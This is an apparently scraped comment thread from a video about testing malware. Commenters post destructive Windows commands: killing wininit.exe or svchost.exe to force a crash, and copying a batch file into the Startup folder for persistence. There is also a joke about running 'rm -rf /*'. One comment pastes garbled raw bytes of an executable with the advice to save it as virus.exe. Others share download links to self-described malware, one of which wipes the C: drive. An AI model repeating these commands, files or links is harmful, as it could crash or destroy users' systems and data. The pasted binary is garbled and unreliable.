BSOD(Windows 7): taskkill /IM wininit.exe /F
BSOD(Windows 10):taskkill /IM svchost.exe /F
Add batch to startup: copy /y %~ f0 "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NAME.bat
It justs shutdown pc
0 likes@D2RG6 That doesn't work!
0 likesstarts with shutdown ends up suggesting people to run sudo rm -rf /* on Q&A forums
2 likesJust log on safe mode and fick it
0 likesAdd the "-c" parameter to put a message:
1 likeshutdown -r -t -1 c "Hey!"
Sub to me plz as well! I’m awesome! If you sub to me I’ll sub to you!
0 likestrashware
0 likesI mean, all of these programs are garbage, but they are less garbage than your garbage music.
0 likesHello! I do not have any Mail.ru accounts, but sinceretly, I want you to try out the malware (maybe trojan) I finished one week ago. Tested on Windows NT 6.0, 6.1 (Vista & 7) It's on batch, so I call it garbage. 😅 Anyway, here's the link:
0 likesSE7ENKILL
github.com/Duckloveshack/Se7enkill
Here’s some good codes:
43 likesC:\Enderman\virus.exe
Also like it!
Replies (1)
C:\Users\EnderMan\Desktop\Virus.exe
2 likesHere is some nice code too:
0 likesMZ ÿÿ ¸ @ è º ´ Í!¸LÍ!This program cannot be run in DOS mode.
$ Ì>ʈoP™ˆoP™ˆoP™ós\™ŠoP™`p[™‰oP™
s^™‡oP™êpC™ oP™ˆoQ™ÊoP™`pZ™×oP™0iV™‰oP™RichˆoP™ PE L 9†rX à
ð € V‹ @ p± “p È < ± I .text öæ ð `.rdata „
@ @.data ˜° @ À.rsrc I ± P 0 @ @ U‹ì¸„ñ èct W \ŽA ˆ…<^ÿÿ¹ó 3À ½=^ÿÿó«f«ªŠ
`ŽA ˆ tMÿÿ¹ó 3À ½uMÿÿó«f«ªŠdŽA ˆ•LUÿÿ¹ó 3À ½MUÿÿó«f«ª hŽA ˆ…˜<ÿÿ¹ó 3À ½™<ÿÿó«f«ªŠ
lŽA ˆ œDÿÿ¹ó 3À ½ Dÿÿó«f«ªŠpŽA ˆ•Ø,ÿÿ¹ó 3À ½Ù,ÿÿó«f«ª tŽA ˆ…¼4ÿÿ¹ó 3À ½½4ÿÿó«f«ªŠ
xŽA ˆ €üÿ¹ó 3À ½ üÿó«f«ªŠ|ŽA ˆ•¸üÿ¹ó 3À ½¹üÿó«f«ª €ŽA ˆ…ÀÏÿÿ¹ó 3À ½ÁÏÿÿó«f«ªŠ
„ŽA ˆ àÇÿÿ¹ó 3À ½áÇÿÿó«f«ªŠˆŽA ˆ•,áÿÿ¹ó 3À ½-áÿÿó«f«ª ŒŽA ˆ…(Ùÿÿ¹ó 3À ½)Ùÿÿó«f«ªÇ…Äýÿÿ Š
ŽA ˆ Püÿ¹Y 3À ½Qüÿó«f«ªÇ…DUÿÿ Ç…lLÿÿ Ç…hDÿÿ Ç…HUÿÿ Š”ŽA ˆ• ×ÿÿ¹Y 3À ½‘×ÿÿó«f«ª ˜ŽA ˆ…
fÿÿ3ɉ
fÿÿ‰ fÿÿ‰ fÿÿˆ fÿÿŠœŽA ˆ•ˆüÿ¹Oà 3À ½‰üÿó«f«ª ŽA ˆ…fÿÿ¹i 3À ½fÿÿó«f«ªŠ
¤ŽA ˆ Ìþÿÿ¹@ 3À ½Íþÿÿó«f«ªŠ¨ŽA ˆ•üèÿÿ¹á 3À ½ýèÿÿó«f«ª ¬ŽA ˆ…Èýÿÿ¹@ 3À ½Éýÿÿó«f«ªŠ
°ŽA ˆ pLÿÿ¹@ 3À ½qLÿÿó«f«ªŠ´ŽA ˆ•]ÿÿ¹@ 3À ½]ÿÿó«f«ª ¸ŽA ˆ…„üÿÿ¹@ 3À ½…üÿÿó«f«ªŠ
¼ŽA ˆ lDÿÿ3Ò‰•mDÿÿ‰•qDÿÿ‰•uDÿÿ‰•yDÿÿf‰•}Dÿÿˆ• Dÿÿ ÀŽA ˆ…ˆýÿÿ¹ 3À ½‰ýÿÿ󫪊
ÄŽA ˆ øàÿÿ¹ 3À ½ùàÿÿ󫪊ȎA ˆ•øØÿÿ¹ 3À ½ùØÿÿó«ªÇ…áÿÿ Ç…Ùÿÿ Ç…°Ïÿÿ Ç…Ùÿÿ Ç…áÿÿ Ç…¨ýÿÿ Ç… áÿÿ Ç…¬ýÿÿ Ç…$áÿÿ Ç… Ùÿÿ Ç…Œ<ÿÿ Ç…¨4ÿÿ Ç… <ÿÿ Ç…”<ÿÿ ÇEÐ Ç…´Ïÿÿ ÌŽA ˆ…È,ÿÿ3ɉ É,ÿÿ‰ Í,ÿÿ‰ Ñ,ÿÿf‰ Õ,ÿÿŠÐŽA ˆ• ^ÿÿ¹ 3À ½!^ÿÿó« ÔŽA ˆ…€Dÿÿ¹ 3À ½ Dÿÿó«Š
ØŽA ˆMÔ¹ 3À }Õó«ŠÜŽA ˆ•ÄÇÿÿ¹ 3À ½ÅÇÿÿó«Ç…¸Ïÿÿ àŽA ˆ…¬4ÿÿ3ɉ 4ÿÿ‰ ±4ÿÿ‰ µ4ÿÿf‰ ¹4ÿÿŠäŽA ˆUð3À‰Eñ‰Eõ‰Eùf‰EýŠ
èŽA ˆ °ýÿÿ3Ò‰•±ýÿÿ‰•µýÿÿ‰•¹ýÿÿf‰•½ýÿÿÇ…¼Ïÿÿ Ç4‰A K jõÿ A £
ñ h hìaA j ÿ A ‰…¼ÏÿÿÇ…¼Ïÿÿ hìaA è'n ƒÄ‰…DUÿÿë‹…DUÿÿƒè‰…DUÿÿƒ½DUÿÿ~Jj‹ DUÿÿQhìaA èeB ƒÄ
PèøA ƒÄƒø\u$‹•DUÿÿRhìaA è C ƒÄPhtuA èñk ƒÄëëžh0A h‰A èÛk ƒÄh<A h‰A èÉk ƒÄÇ4‰A ¼# jèMe ƒÄ‰…DUÿÿ‹…DUÿÿPhHA h8‰A è
m Ā
jh8‰A è]C ƒÄPh`‰A èyk ƒÄÛ…DUÿÿƒìÝ$èbA ƒÄPh8‰A èWk ƒÄjh8‰A èC ƒÄPhˆ‰A è:k ƒÄhìŽA ÄÇÿÿQè&k ƒÄÇ…DUÿÿ ë‹•DUÿÿƒÂ‰•DUÿÿƒ½DUÿÿ}^j‹…DUÿÿPhˆ‰A è0A ƒÄ
P MÔQèßj ƒÄhLA UÔRè¾k ƒÄ…ÀuhPA EÔPè¹j ƒÄ MÔQ •ÄÇÿÿRè¶j ƒÄëŠ …ÄÇÿÿPhˆ‰A è j ƒÄhˆ‰A èñi ƒÄ‰…áÿÿ‹ áÿÿkɉ áÿÿÛ…áÿÿƒìÝ$èW@ ƒÄP •ˆýÿÿRèJj ƒÄ …ˆýÿÿPèƒd ƒÄP øàÿÿQè+j ƒÄj •øàÿÿRèšA ƒÄP …øØÿÿPè
j ƒÄ øØÿÿQ •ˆýÿÿRèôi ƒÄ …øØÿÿP ˆýÿÿQèîi ƒÄ •ˆýÿÿRh‰A èÊi ƒÄhTA h ‰A è¸i ƒÄÇ…DUÿÿ ë‹…DUÿÿƒÀ‰…DUÿÿƒ½DUÿÿ
}.j‹ DUÿÿQh‰A èÂ? ƒÄ
PèU? ƒÄ‹•DUÿÿ‰•à‘A ëºÇ…DUÿÿ ë‹…DUÿÿƒÀ‰…DUÿÿƒ½DUÿÿ
}.j‹ DUÿÿQh‰A èp? ƒÄ
Pè? ƒÄ‹•DUÿÿ‰• ‘A ëºÇ…DUÿÿ hðŽA h,"A èøh ƒÄhôŽA …ÈýÿÿPèäh ƒÄh,"A h ÿ A ‰…¼Ïÿÿ‹ ¼ÏÿÿQh,"A è:@ ƒÄPh,"A è¬h ƒÄj è&> ƒÄP •€DÿÿRè’h ƒÄjmè
> ƒÄP …€DÿÿPèˆh ƒÄjkèò= ƒÄP €DÿÿQènh ƒÄjdèØ= ƒÄP •€DÿÿRèTh ƒÄjiè¾= ƒÄP …€DÿÿPè:h ƒÄjrè¤= ƒÄP €DÿÿQè h ƒÄj èŠ= ƒÄP •€DÿÿRèh ƒÄjrèp= ƒÄPjeèe= ƒÄPjdèZ= ƒÄPjlèO= ƒÄPjoèD= ƒÄPjfè9= ƒÄPjeè.= ƒÄPh,"A h`A h4$A èi ƒÄ(jiè
= ƒÄPh܉A èzg ƒÄjfèô< ƒÄPh܉A èrg ƒÄj èÜ< ƒÄPh܉A èZg ƒÄjnèÄ< ƒÄPh܉A èBg ƒÄjoè¬< ƒÄPh܉A è*g ƒÄjtè”< ƒÄPh܉A èg ƒÄj è|< ƒÄPh܉A èúf ƒÄjeèd< ƒÄPh܉A èâf ƒÄjxèL< ƒÄPh܉A èÊf ƒÄjiè4< ƒÄPh܉A è²f ƒÄjsè< ƒÄPh܉A èšf ƒÄjtè< ƒÄPh܉A è‚f ƒÄj èì; ƒÄPh܉A èjf ƒÄjièÔ; ƒÄPhø‰A èBf ƒÄjfè¼; ƒÄPhø‰A è:f ƒÄj è¤; ƒÄPhø‰A è"f ƒÄjeèŒ; ƒÄPhø‰A è
Save it as virus.exe and enjoy
Sureklicmdacanaqvirusu.exe
0 likesTrash font
0 likes.m..s.
0 likesheres my trash virus https://cdn.discordapp.com/attachments/635388753237639178/651425684308361236/epicvirus.vbs
0 likesno need to censor the link
You should see "Vatican" pseudo-virus
1 likeHey Enderman, can you please test out my virus? I promise this will not be trash :)
0 likesWARNING: DO NOT TEST IT ON A REAL PC! IT WILL DELETE ALL FILES AND DIRECTORIES IN THE C: DRIVE!
Download link: https://mega.nz/#!Y8NwwAyZ!BfPzDHolYmoNKMxljgPsGAWmK18vzRUtpgwj4akfYrc
sub2ender or 14
0 likesSee my new virus: https://youtu.be/dQw4w9WgXcQ
0 likesthis is GARBAGE malware to TRASH them
0 likesTrashware
1 likeCan you try my fake virus please ? (download all files ) https://drive.google.com/open?id=1UU67wxg-4J25_DWX-kDDp3iOQ8474X_h
0 likesWoah
0 likesHa
1 likeReplies (1)
I WATCHED IT
0 likes( ͡° ͜ʖ ͡°) Mind yo buisness
19 likesit actually says that
Replies (4)
guess im the toxic one here
0 likesi want yo buisness
0 likesI had to make a comment as fast as possible to get it out and I couldn’t think of a good one
2 likesWe're not blind you know..
0 likesWindows 2.0 upgrader is what you see in hell
1 likeLel
0 likesMind yo buisness.bat has stopped
3 likesReplies (1)
Ferb, I know what we are going to do today!
1 like